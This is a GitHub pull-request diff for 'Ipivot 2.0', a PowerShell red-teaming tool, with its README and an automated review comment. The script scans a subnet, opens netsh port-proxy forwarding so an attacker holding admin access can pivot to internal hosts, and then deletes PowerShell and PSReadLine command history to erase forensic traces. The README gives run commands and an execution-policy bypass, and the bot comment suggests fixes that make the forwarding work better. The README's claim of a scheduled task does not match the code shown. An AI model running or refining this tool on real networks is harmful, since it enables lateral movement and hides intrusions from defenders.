

Merge pull request #2 from fort3/Dev
Dev
fort3 authored Dec 8, 2024
2 parents 95e8b6c + 977b685 commit 3821a62
Showing 2 changed files with 146 additions and 57 deletions.
158 changes: 116 additions & 42 deletions Ipivot.ps1
@@ -1,3 +1,27 @@
<#
.PARAMETER ConnectingPort
Change this to the connecting port
.PARAMETER ListeningPort
Change this to the listening port
.PARAMETER ListeningAddress
Change this to the listening IP address you want to set the forwarding to
.PARAMETER Network
Change this to the target network you're working on i.e 192.168.0
.PARAMETER HostRange
Change this to determine the range or leave as default depending on your needs
#>
param (
[int]$ConnectingPort = 9080,
[int]$ListeningPort = 9999,
[string]$ListeningAddress = '127.0.0.1',
[string]$Network = '192.168.0',
[int[]]$HostRange = 1..2
)

Write-Output "
****************************************************************************
# # # # # # #
Expand All @@ -14,61 +38,111 @@ Write-Output "
# # # # # # ## # # # #
## # # # #
## # # # #
## ####
IPIVOT - Red Teaming Tool
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
PS: If you happen to find this tool useful then I wouldn't mind a mention ;)
*******************************************************************************
"

#Change this to the connecting port
$Conport = (9080)

#Change this to the listening port
$LisPort = (9999)

#Change this to the listening IP address you want to set the forwarding to
$LisAddr = "127.0.0.1"

#Change this to the target network you're working on i.e 192.168.0
$network = "127.0.0"

#Change this to determine the range or leave as default depending on your needs
$range = 1..10

$ErrorActionPreference= 'silentlycontinue'

#list the network and ports found and apply the forwarding
$(Foreach ($add in $range)
{
$ip = "{0}.{1}" -F $network,$add
Write-Progress "Scanning Network" $ip -PercentComplete (($add/$range.Count)*100)
If(Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip)
{
$socket = new-object System.Net.Sockets.TcpClient($ip, $Conport)
If($socket.Connected)
{ "$ip port $Conport is open"
Write-Progress "Forwarding from listening $LisAddr and $LisPort to target\n"
Write-Output "Forwarding from listening $LisAddr and $LisPort to target......."
$i = 1
foreach ($HostAddress in $HostRange) {
$ip = "{0}.{1}" -f $network, $HostAddress
Write-Progress "Scanning Network" $ip -PercentComplete (($i / $HostRange.Count) * 100)
If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip) {
$socket = new-object System.Net.Sockets.TcpClient($ip, $ConnectingPort)
If ($socket.Connected) {
"$ip port $ConnectingPort is open"
Write-Progress "Forwarding from listening ${ListeningAddress}:$ListeningPort to target\n"
Write-Output "Forwarding from listening ${ListeningAddress}:$ListeningPort to target......."

Write-Output "____________________________________________________________________________________________________________________________"
#piece of the script that does the forwarding
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($LisAddr) listenport=$($LisPort) connectaddress=$($ip) connectport=$($Conport)"
Write-Output "____________________________________________________________________________________________________________________________"

#piece of the script that does the forwarding
try {
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($ListeningAddress) listenport=$($ListeningPort) connectaddress=$($ip) connectport=$($ConnectingPort)"
} catch {
Write-Warning "Could not forward ${ListeningAddress}:$ListeningPort to target......."
}
Write-Progress "Checking if host is listening on port $ListeningPort and $ConnectingPort`n"
Write-Output "Checking if host is listening on port $ListeningPort and $ConnectingPort"

Write-Progress "Checking if host is listening on port $LisPort and $ConPort\n"
Write-Output "Checking if host is listening on port $LisPort and $ConPort"
#verify that the port is listening
Get-NetTCPConnection -LocalPort $LisPort
Get-NetTCPConnection -LocalPort $ConPort
Write-Output "***************************************************************************************************************************"
#verify that the port is listening
Get-NetTCPConnection -LocalPort $ListeningPort
Get-NetTCPConnection -LocalPort $ConnectingPort
Write-Output "***************************************************************************************************************************"
$socket.Close()
} else {
"$ip port $ConnectingPort is not open "

}
else
}
}

Write-Output "***************************************************************************************************************************"
Write-Progress "Now clearing command history and footprints from powershell saved sessions......."
Write-Output "Now clearing command history and footprints from powershell saved sessions......."

#Clears the command history, including the saved-to-file history, if applicable.
#CAUTION!!! As this is a high impact activity, you will asked to confirm this action
function Clear-SavedHistory {
[CmdletBinding(ConfirmImpact='High', SupportsShouldProcess)]
param(
)
$havePSReadline = ($null -ne (Get-Module -EA SilentlyContinue PSReadline))
Write-Verbose "PSReadline present: $havePSReadline"
$target = if ($havePSReadline)
{
"entire command history, including from previous sessions"
}
else
{
"command history"
}
if (-not $pscmdlet.ShouldProcess($target))
{
return
}

if ($havePSReadline)
{
Clear-Host

# Remove PSReadline's saved-history file.Get-History
if (Test-Path (Get-PSReadlineOption).HistorySavePath)
{
"$ip port $Conport is not open "
# Abort, if the file for some reason cannot be removed.
Remove-Item -EA Stop (Get-PSReadlineOption).HistorySavePath

# To be safe, we recreate the file (empty).
$null = New-Item -Type File -Path (Get-PSReadlineOption).HistorySavePath
}
}
})

# Clear PowerShell's own history
Clear-History

# Clear PSReadline's *session* history.
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
}
else
{ # Without PSReadline, we only have a *session* history.
Clear-Host
# Clear the doskey library's buffer, used pre-PSReadline.
# !! Unfortunately, this requires sending key combination Alt+F7.
# Thanks, https://stackoverflow.com/a/13257933/45375
$null = [system.reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[System.Windows.Forms.SendKeys]::Sendwait('%{F7 2}')

# Clear PowerShell's own history
Clear-History
}
}

Clear-SavedHistory
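Review bot: The new try/catch around the `Invoke-Expression "netsh interface portproxy add ..."` call cannot report a failed port-proxy add, because netsh is a native command: a non-zero exit (for example when the session is not elevated) sets `$LASTEXITCODE` but throws nothing, so the `Write-Warning` branch never runs, and with `$ErrorActionPreference = 'silentlycontinue'` still set the failure is silent. Invoke-Expression is also unnecessary here and re-parses the unvalidated `[string]` parameters `$ListeningAddress` and `$Network` as PowerShell source; calling netsh directly with quoted arguments avoids that, e.g. `netsh interface portproxy add v4tov4 "listenaddress=$ListeningAddress" "listenport=$ListeningPort" "connectaddress=$ip" "connectport=$ConnectingPort"` followed by `if ($LASTEXITCODE -ne 0) { Write-Warning "Could not forward ${ListeningAddress}:$ListeningPort to target......." }`. Separately, `$i` is initialised to 1 before the foreach but is never incremented inside the loop as shown in the hunk, so the Write-Progress percentage stays at 1/`$HostRange.Count` for every host; add `$i++` after the Write-Progress line. The `\n` in the first Write-Progress string is a literal backslash-n in PowerShell (the later line correctly uses `` `n ``).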
45 changes: 30 additions & 15 deletions README.md
@@ -1,5 +1,5 @@
# Ipivot
# # # # # # #
# # # # # # #
# # # # # # #
# #
# #
Expand All @@ -13,42 +13,57 @@
# # # # # # ## # # # #
## # # # #
## # # # #
## ####
IPIVOT - Red Teaming Tool
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
Addition: Creates a scheduled task to clear the command history in PSReadLine\ConsoleHost_history.txt

PS: If you happen to find this tool useful then I wouldn't mind a mention ;)

Instructions for use
## Instructions for use

Change the Parameters below depending on your needs:

PARAMETER ConnectingPort
#Change this to the connecting port
$Conport = (9080)

PARAMETER ListeningPort
#Change this to the listening port
$LisPort = (9999)

PARAMETER ListeningAddress
#Change this to the listening IP address you want to set the forwarding to
$LisAddr = "127.0.0.1"

PARAMETER Network
#Change this to the target network you're working on i.e 192.168.0
$network = "127.0.0"

#Change this to determine the network range or leave as default depending on your needs
$range = 1..10
PARAMETER HostRange
#Change this to determine the range or leave as default depending on your needs

# Script execution example
.\Ipivot.ps1 -ConnectingPort 9080 -ListeningPort 9999 -Network 127.0.0 -ListeningAddress 127.0.0.1 -HostRange (1..200)


# For Errors like below:

![image](https://github.com/user-attachments/assets/f6e6d43b-e397-43e9-b617-0db74ff1cb89)

#Enter the command below in the Powershell CLI
Set-ExecutionPolicy RemoteSigned -Scope Process
# Enter the command below in the Powershell CLI
Set-ExecutionPolicy RemoteSigned -Scope Process

# Example Output:
![image](https://github.com/user-attachments/assets/2c45cd1f-0415-46b4-b686-5c3a7100fee9)
![Ipivot 2 0_Parameters_5](https://github.com/user-attachments/assets/5b4c8f14-a16f-451f-afcb-560a5cb6a313)


# CAUTION
As this tool performs a high impact action like clearing the command history and PSReadline sessions and file, you will be asked to confirm this action with a prompt.
![Ipivot 2 0_Parameters_3](https://github.com/user-attachments/assets/2acd0d89-770d-4b24-9033-3299b5c5b044)

DISCLAIMER: Thoughts, Opinions and the Information in this script is strictly for educational purposes alone and use of any code or technique for unlawful or unauthorized activities is strictly prohibited.

This project is free to use!!

Would appreciate some feedback ;)
Would appreciate some feedback though ;)

